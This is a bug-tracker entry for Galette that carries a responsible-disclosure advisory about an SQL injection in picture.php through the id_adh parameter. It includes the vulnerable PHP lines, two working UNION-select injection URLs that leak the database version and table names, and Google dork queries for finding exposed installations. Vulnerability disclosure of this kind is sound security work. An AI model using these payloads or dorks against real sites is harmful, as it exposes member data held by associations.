Anomalie #250: Security: SQL Injection in picture.php via param idh_adh affect by versions 0.63, 0.63.1, 0.63.2, 0.63.3, 0.64rc1 - Galette - Galette bugs & features

Anomalie #250

Mis à jour par Johan Cwiklinski il y a presque 12 ans

Hi developers, 

 I've discovered a SQL injection in Galette software on 0.63 branch version and it's seems not fixed regarding the ChangeLog here [1]. The advisory below: 

 h2. Affected versions 

 It seems only versions listed here are vulnerable : 

 * 0.63 
 * 0.63.1 
 * 0.63.2 
 * 0.63.3 
 * 0.64rc1 

 h2. Vulnerability 

 The vulnerability is located in file *includes/picture.class.php* at L.71-73 (cf. [2]) 

 <pre lang="php"> 
  ... 
          $sql = "SELECT picture,format 
                  FROM ".PREFIX_DB."pictures 
                  WHERE id_adh=".$id_adh; 
  ... 
 </pre> 

 $id_adh is an input controlled by the user in file *picture.php* and *not* filtered at line L.35-36 (cf. [3]) : 

 <pre lang="php"> 
  ... 
  else 
            $id_adh = $_GET['id_adh']; 
  ... 
 </pre> 

 h2. Exploitation 

 The queries below allow to inject SQL injection to create a data leak in order to retrieve datas on database and server configuration on a Galette fresh installation 

 - Leak MySQL Version 

 <pre> 
 /picture.php?id_adh=0+and+1=0+union+select+@@version,null 
 </pre> 

 - Leak tables name on a MySQL 5.x (group_concat is limiting output here) 

 <pre> 
 /picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables 
 </pre> 

 I don't want to show too many exploitable queries to avoid the usage by kiddies but it's possible to inject hard queries in order to leak adherents datas. 

 h2. Impact of the vulnerablity 

 Galette is a well known adherent web interface used by lots of associations (specially French one), it's possible to look for vulnerable targets using the Google dorks below: 

 * inurl:self_adherent.php intitle:"Galette v0.63" 
 * inurl:self_adherent.php intitle:Galette 

 The impact is to create database data leaks exposure on any vulnerable Galette installation. 

 h2. Mitigation of the vulnerability 

 Update to 0.7.x version 

 h2. Discovered by 

 Sofian Brabez <sbz@nbs-system.com> 

 h2. Timeline 

 * 09/05/2012: Contact vendor through bug tracker on redmine.ulysses.fr readmine.ulysses.fr 

 h2. References 

 [1] http://galette.tuxfamily.org//documentation/fr/changelog.html 
 [2] http://svn.gna.org/viewcvs/galette/branches/galette-0-63-bugfix/galette/includes/picture.class.php?revision=826&view=markup 
     http://git.tuxfamily.org/galette/galette?p=galette/galette.git;a=blob;f=includes/picture.class.php;h=9c4985eeb37369c9b64af6e11e6840645474fb2c;hb=7b4b477b0349f00c7555cbd66870ff6f22831faf#l70 
 [3] http://svn.gna.org/viewcvs/galette/branches/galette-0-63-bugfix/galette/picture.php?revision=825&view=markup 
     http://git.tuxfamily.org/galette/galette?p=galette/galette.git;a=blob;f=picture.php;h=8ec80ab9f67b66f2fced141d9512332cf64f334e;hb=7b4b477b0349f00c7555cbd66870ff6f22831faf#l35

Retour

Projet

Général

Profil

Galette

Anomalie #250